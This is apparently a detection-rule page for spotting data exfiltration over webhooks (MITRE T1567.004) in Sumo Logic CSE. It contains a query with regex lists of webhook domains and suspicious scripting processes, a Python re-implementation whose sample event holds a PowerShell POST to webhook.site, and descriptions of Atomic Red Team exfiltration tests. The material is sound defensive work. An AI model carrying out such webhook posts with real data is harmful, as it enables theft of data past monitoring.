Detect Exfiltration Over Webhook in Sumo Logic CSE
Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple HTTP/S push mechanisms supported by collaboration platforms such as Discord, Slack and Microsoft Teams, and by generic services such as webhook.site. Adversaries abuse these endpoints either by linking an adversary-controlled webhook to a victim-owned SaaS service, which gives automated, repeated exfiltration of emails or chat messages, or by manually posting staged data directly to a webhook URL with scripting tools. Because webhook traffic is HTTPS and destined for widely trusted SaaS domains, it blends with normal enterprise traffic and often bypasses data loss prevention controls. Observed real-world usage includes Discord webhooks used for credential and token exfiltration by malicious npm packages, Slack webhooks used by insider threats, and Microsoft Teams webhooks abused in SQL Server xp_cmdshell lateral movement chains.
MITRE ATT&CK
- Tactic: Exfiltration
- Technique: T1567 Exfiltration Over Web Service
- Sub-technique: T1567.004 Exfiltration Over Webhook
- Canonical reference: https://attack.mitre.org/techniques/T1567/004/
Sumo Detection Query
(_sourceCategory="windows/sysmon" OR _sourceCategory="endpoint/process" OR _sourceCategory="proxy/web")
// Stage 1: keep only messages that mention a known webhook host. The pattern must be a /regex/ literal;
// a quoted string after "matches" is treated as a wildcard glob, so a quoted "(?i)(...)" never matches.
| where _raw matches /(?i)(discord\.com\/api\/webhooks|hooks\.slack\.com\/services|webhook\.site|webhooks\.site|outlook\.office\.com\/webhook|outlook\.office365\.com\/webhook|pipedream\.net|requestbin\.com|requestcatcher\.com|hookbin\.com|beeceptor\.com|smee\.io|ntfy\.sh|pushover\.net)/
// Stage 2: field extraction. Sumo uses Java regex, so named groups are (?<name>...), not (?P<name>...).
// (?<!\w) anchors each key name so that ParentImage, DestinationHostname and similar keys are not
// mistaken for Image or hostname.
| parse regex field=_raw "(?i)(?<!\w)(?:Image|process_name|Process)[\s=:\"]+(?<ProcessName>[^\s\"\|,]+)" nodrop
| parse regex field=_raw "(?i)(?<!\w)(?:CommandLine|command_line|cmdline)[\s=:\"]+(?<CommandLine>[^\|\n]{0,512})" nodrop
| parse regex field=_raw "(?i)(?<!\w)(?:DestinationHostname|dest_hostname|cs-host|url)[\s=:\"]+(?<WebhookTarget>[^\s\"\|,]+)" nodrop
// cs-bytes is the client-to-server byte count in W3C proxy logs; sc-bytes is the response size, not data sent
| parse regex field=_raw "(?i)(?<!\w)(?:BytesSent|bytes_out|cs-bytes)[\s=:\"]+(?<BytesSentStr>[0-9]+)" nodrop
| parse regex field=_raw "(?i)(?<!\w)(?:User|username|AccountName)[\s=:\"]+(?<UserName>[^\s\"\|,]+)" nodrop
| parse regex field=_raw "(?i)(?<!\w)(?:hostname|ComputerName|host)[\s=:\"]+(?<Hostname>[^\s\"\|,]+)" nodrop
| num(BytesSentStr) as BytesSent
// Stage 3: enrichment. Derived fields are written as if(...) as Field; Sumo has no eval operator.
| if(ProcessName matches /(?i)(powershell\.exe|pwsh\.exe|cmd\.exe|python\.exe|python3|node\.exe|curl\.exe|wget\.exe|wscript\.exe|cscript\.exe|mshta\.exe|rundll32\.exe|certutil\.exe|bitsadmin\.exe)/, 1, 0) as SuspiciousProcess
| if(BytesSent > 1048576, 1, 0) as LargeTransfer
| if(CommandLine matches /(?i)(discord\.com\/api\/webhooks|hooks\.slack\.com|webhook\.site|pipedream\.net|ntfy\.sh)/, 1, 0) as WebhookCmdLine
| if(SuspiciousProcess = 1 and LargeTransfer = 1, "SuspiciousProcessLargeTransfer",
    if(SuspiciousProcess = 1, "SuspiciousProcessWebhookConn",
    if(WebhookCmdLine = 1, "WebhookInCommandLine",
    if(LargeTransfer = 1, "LargeTransferToWebhook", "WebhookContact")))) as SignalType
// Stage 4: aggregation. Sumo has no stats keyword; the aggregate functions follow the pipe directly.
| count as EventCount,
  sum(BytesSent) as TotalBytesSent,
  values(SignalType) as Signals,
  values(WebhookTarget) as WebhookTargets,
  values(CommandLine) as CommandLines,
  min(_messageTime) as FirstSeen,
  max(_messageTime) as LastSeen
  by Hostname, UserName, ProcessName
| if(TotalBytesSent > 1048576, "HIGH", if(EventCount > 5, "HIGH", "MEDIUM")) as Priority
| sort by TotalBytesSent desc, EventCount desc

This Sumo Logic CSE query detects exfiltration over webhook endpoints by parsing Sysmon process and network events alongside proxy logs. It extracts the process name, command line, destination hostname and bytes-sent fields to identify suspicious processes connecting to known webhook domains. Each event is classified into one signal type: suspicious process with a large transfer (>1MB), suspicious process connecting to a webhook, webhook URL in the command line, any large outbound transfer to a webhook endpoint, or plain webhook contact. Results are grouped by host, user and process, and priority is escalated to HIGH when the group's total transfer exceeds 1MB or it contains more than 5 events.
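The classification and priority rules of the query, re-implemented here as an added Python example (not the page's query or any Sumo Logic code) and run over three constructed events: a Sysmon-style PowerShell post of 2 MiB to webhook.site, a proxy-style Slack post from a node.exe bot, and a non-webhook transfer that the first-stage filter drops. The key=value sample format, hostnames, users and all function names are this example's own assumptions.

```python
import re
from collections import defaultdict
# Added example, not the page's query: its signal and priority logic in Python, run over
# constructed sample events (pipe-delimited key=value pairs, not real telemetry).
ONE_MIB = 1048576
WEBHOOK_RE = re.compile(r"(?i)(discord\.com/api/webhooks|hooks\.slack\.com/services|webhook\.site|"
                        r"outlook\.office\.com/webhook|pipedream\.net|ntfy\.sh)")
SUSPICIOUS_RE = re.compile(r"(?i)(powershell\.exe|pwsh\.exe|cmd\.exe|python\.exe|node\.exe|curl\.exe)")
# One extractor per parse stage; the leading \b stops DestinationHostname from being read as Hostname.
FIELD_RE = {
    "ProcessName": r"(?i)\b(?:Image|process_name)[\s=:\"]+(?P<v>[^\s\"|,]+)",
    "CommandLine": r"(?i)\b(?:CommandLine|cmdline)[\s=:\"]+(?P<v>[^|\n]{0,512})",
    "BytesSent": r"(?i)\b(?:BytesSent|cs-bytes)[\s=:\"]+(?P<v>[0-9]+)",
    "UserName": r"(?i)\b(?:User|username)[\s=:\"]+(?P<v>[^\s\"|,]+)",
    "Hostname": r"(?i)\b(?:ComputerName|hostname|host)[\s=:\"]+(?P<v>[^\s\"|,]+)",
}
SAMPLE_EVENTS = [
    "ComputerName=WS01|User=CORP\\jdoe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "CommandLine=powershell -c Invoke-RestMethod -Uri https://webhook.site/EXAMPLE-ID -Method POST|"
    "DestinationHostname=webhook.site|BytesSent=2097152",  # Sysmon-style, 2 MiB out
    "host=SRV02|username=svc_slack|process_name=node.exe|"
    "url=https://hooks.slack.com/services/EXAMPLE|cs-bytes=300",  # proxy-style bot post
    "ComputerName=WS01|User=CORP\\jdoe|Image=C:\\Windows\\explorer.exe|"
    "DestinationHostname=example.com|BytesSent=9000000",  # no webhook domain: filtered out
]

def parse(raw):
    ev = {n: (m.group("v") if (m := re.search(p, raw)) else "") for n, p in FIELD_RE.items()}
    ev["BytesSent"] = int(ev["BytesSent"] or 0)
    return ev

def signal_type(ev):
    susp = bool(SUSPICIOUS_RE.search(ev["ProcessName"]))
    large = ev["BytesSent"] > ONE_MIB
    if susp:
        return "SuspiciousProcessLargeTransfer" if large else "SuspiciousProcessWebhookConn"
    if WEBHOOK_RE.search(ev["CommandLine"]):
        return "WebhookInCommandLine"
    return "LargeTransferToWebhook" if large else "WebhookContact"

def aggregate(raw_events):
    groups = defaultdict(lambda: {"EventCount": 0, "TotalBytesSent": 0, "Signals": set()})
    for ev in (parse(r) for r in raw_events if WEBHOOK_RE.search(r)):  # first-stage domain filter
        g = groups[(ev["Hostname"], ev["UserName"], ev["ProcessName"])]
        g["EventCount"] += 1
        g["TotalBytesSent"] += ev["BytesSent"]
        g["Signals"].add(signal_type(ev))
    for g in groups.values():
        g["Priority"] = "HIGH" if g["TotalBytesSent"] > ONE_MIB or g["EventCount"] > 5 else "MEDIUM"
    return dict(groups)
```

The node.exe bot row lands at MEDIUM with a single SuspiciousProcessWebhookConn signal, which is the shape of the false positives listed under tuning below and the reason a scripting runtime alone should not be treated as HIGH.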
False Positives & Tuning
- Slack or Teams bots running as services under scripting runtimes (Python, Node.js) that periodically post status updates to incoming webhooks configured by IT or operations teams.
- Developer machines running test scripts against webhook.site, requestbin.com, or pipedream.net for HTTP integration testing during normal development workflows.
- Security orchestration tools (SOAR platforms) using curl or Python SDKs to forward incident notifications to Slack or Teams channels via webhook URLs.
Testing Methodology
Validate this detection against the 4 Atomic Red Team tests below. Each test lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1: Exfiltrate Data via Discord Webhook using PowerShell
  Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'Invoke-RestMethod' and 'webhook.site'. Sysmon Event ID 3: Network Connection from powershell.exe to webhook.site on port 443. DeviceNetworkEvents: RemoteUrl containing webhook.site, InitiatingProcessFileName=powershell.exe, BytesSent > 0.
- Test 2: Exfiltrate File Contents via curl to Webhook Endpoint
  Expected signal: Sysmon Event ID 1: Process Create for cmd.exe (echo/type) and curl.exe with CommandLine containing 'webhook.site' and '-X POST'. Sysmon Event ID 11: File Create for the staging file in %TEMP%. Sysmon Event ID 3: Network Connection from curl.exe to webhook.site on port 443. DeviceNetworkEvents: InitiatingProcessFileName=curl.exe, RemoteUrl containing webhook.site.
- Test 3: Python Requests Library Webhook Exfiltration
  Expected signal: Sysmon Event ID 1: Process Create with Image=python.exe, CommandLine containing 'urllib.request', 'webhook.site', and 'POST'. Sysmon Event ID 3: Network Connection from python.exe to webhook.site on port 443. DeviceNetworkEvents: InitiatingProcessFileName=python.exe, RemoteUrl=webhook.site.
- Test 4: Automated SaaS Webhook Exfiltration via Microsoft Teams Incoming Webhook
  Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'Invoke-WebRequest' and 'outlook.office.com/webhook'. Sysmon Event ID 3: Network Connection from powershell.exe to outlook.office.com on port 443. DeviceNetworkEvents: RemoteUrl containing /webhook/, InitiatingProcessFileName=powershell.exe.
References
- https://attack.mitre.org/techniques/T1567/004/
- https://medium.com/checkmarx-security/webhook-party-malicious-packages-caught-exfiltrating-data-via-legit-webhook-services-6e046b07d191
- https://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord
- https://blog.talosintelligence.com/collab-app-abuse/
- https://github.com/pushsecurity/saas-attacks/blob/main/techniques/webhooks/description.md
- https://www.microsoft.com/security/blog/2023/10/03/defending-new-vectors-threat-actors-attempt-sql-server-to-cloud-lateral-movement/
- https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks
- https://www.redhat.com/en/topics/automation/what-is-a-webhook
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-devicenetworkevents-table
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-deviceprocessevents-table
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.004/T1567.004.md